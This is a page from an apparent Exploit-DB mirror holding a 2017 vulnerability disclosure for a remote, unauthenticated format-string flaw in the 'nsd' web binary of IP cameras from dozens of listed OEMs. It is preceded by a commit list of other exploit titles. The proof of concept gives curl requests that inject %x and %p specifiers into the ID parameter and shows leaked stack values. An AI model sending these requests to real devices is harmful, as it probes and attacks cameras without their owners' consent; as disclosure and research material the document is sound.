bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/multiple/dos/43998.txt
Offensive Security 2c4b08963a DB: 2018-02-08 
25 changes to exploits/shellcodes

QNAP NAS Devices - Heap Overflow

QNAP NVR/NAS - Buffer Overflow (PoC)
QNAP NVR/NAS Devices - Buffer Overflow (PoC)
Cisco ASA - Crash PoC
Asterisk 13.17.2 - 'chan_skinny' Remote Memory Corruption
Android - 'getpidcon' Permission Bypass in KeyStore Service
Multiple OEM - 'nsd' Remote Stack Format String (PoC)

HP-UX 11.0 - pppd Stack Buffer Overflow
HP-UX 11.0 - 'pppd' Local Stack Buffer Overflow

SGI IRIX - 'LsD' Multiple Buffer Overflows
SGI IRIX - 'LsD' Multiple Local Buffer Overflows

PostScript Utilities - 'psnup' Argument Buffer Overflow
PostScript Utilities - 'psnup' Local Buffer Overflow

Open Cubic Player 2.6.0pre6/0.1.10_rc5 - Multiple Buffer Overflows
Open Cubic Player 2.6.0pre6/0.1.10_rc5 - Multiple Local Buffer Overflows

MalwareFox AntiMalware 2.74.0.150 - Privilege Escalation
Geovision Inc. IP Camera/Video/Access Control - Multiple Remote Command Execution / Stack Overflow / Double Free / Unauthorized Access
Geovision Inc. IP Camera & Video - Remote Command Execution
Axis SSI - Remote Command Execution / Read Files
Axis Communications MPQT/PACS - Heap Overflow / Information Leakage
Adobe Coldfusion 11.0.03.292866 - BlazeDS Java Object Deserialization Remote Code Execution
Herospeed - 'TelnetSwitch' Remote Stack Overflow / Overwrite Password / Enable TelnetD
Uniview - Remote Command Execution / Export Config (PoC)
Vitek - Remote Command Execution / Information Disclosure (PoC)
Vivotek IP Cameras - Remote Stack Overflow (PoC)
Dahua Generation 2/3 - Backdoor Access
HiSilicon DVR Devices - Remote Code Execution

JiRos Banner Experience 1.0 - Unauthorised Create Admin
JiRos Banner Experience 1.0 - Unauthorized Create Admin
Doctor Search Script 1.0.2 - Persistent Cross-Site Scripting
Multilanguage Real Estate MLM Script - Persistent Cross-Site Scripting
Naukri Clone Script - Persistent Cross-Site Scripting
Hot Scripts Clone Script Classified - Persistent Cross-Site Scripting
Online Test Script 2.0.7 - 'cid' SQL Injection
Entrepreneur Dating Script 2.0.2 - Authentication Bypass
2018-02-08 05:01:53 +00:00

123 lines
No EOL
2.5 KiB
Text
Raw Blame History

[STX]
Subject: Remote Stack Format String in 'nsd' binary from multiple OEM
Attack vector: Remote
Authentication: Anonymous (no credentials needed)
Researcher: bashis <mcw noemail eu> (December 2017)
PoC: https://github.com/mcw0/PoC
Release date: December 14, 2017
Full Disclosure: 0-Day
-[ PoC ]-
1)
$ curl 'http://[IP:PORT]/main/index.asp?ID=AAAA|%x|%x|%x|%x|%x|%x|%x|%x|%x|%x|%x|%x&lg=BBBB'
[...]
function initHideWidget(){
document.getElementById("devip").value = "192.168.57.20";
document.getElementById("cameraid").value = 1;
document.getElementById("streamid").value = 1;
document.getElementById("id").value = "AAAA|5e2ff9f8|ffffffff|5e3006db|ea60|1|2|1|1|0|20cd3e0|7263733c|20747069";
document.getElementById("lg").value = "BBBB";
document.getElementById("port").value = 60000;
document.getElementById("ipver").value = 1;
document.getElementById("tprotocol").value = 2;
document.getElementById("devtype").value = 1;
document.getElementById("ismotorize").value = 1;
[...]
Note: 'BBBB' are hiding within '5e3006db'
2)
curl -v "http://[IP:PORT]/Maintain/upgrade.asp?ID=|%p|%p|%p|%p|%p|%p"
[...]
function initHideWidget(){
document.getElementById("ip").value = "192.168.57.20";
document.getElementById("id").value = "|0x5d300484|0xffffffff|0xea60|0x1|0x2|0x1";
document.getElementById("port").value = 60000;
document.getElementById("ipver").value = 1;
document.getElementById("tprotocol").value = 2;
document.getElementById("devtype").value = 1;
[...]
-[ Affected OEM ]-
Huatu
I-View
IP Camera Web Service
Stanley Security
3D Eyes CCTV Platform
Protech Srl
LS vision
GWSECU
12 Legion Solution
HDVuk IP Camera
Intervid Security
Suzuki Tech
Wellsite IP Camera
iBrido
Protec IP Camera
Maxtron IP Camera
Ascendent
GTvs IP Camera
Squilla
Bikal IP Camera
MW Power
Alfa Vision
KMA Security
Tough Dog Security
Kpro HQ
Lanetwork
AFM Vision
ZetaDo
Jobsight Inc.
Datalab IP Technologies
4Tvision
Proline UK
Tanz
Aisonic
HD-IP
PreSec Security Solution
EagleVision
Elemis Delta
Imenara
Gigamedia
Xavee
Honeywell
Boss Security
A.R.T Surveillance
Global Security
Securicorp
Securetech
Vapplica
Star
Stic
NeXus
Alnet
Spy Smart
Kompsos
Adler Security Systems
Nextan
Access
Toprotect
Kawah
LS StrateX
Senpei CCTV
Metcom
AFM Vision
Doron Technologies
Saviour Smart IoT Systems
Eagle-Eye
Faucon.at
BlueEagle Security
Campro
Opple
Level One
Video and Monitor System
K&D
[ETX]
Reference in a new issue View git blame Copy permalink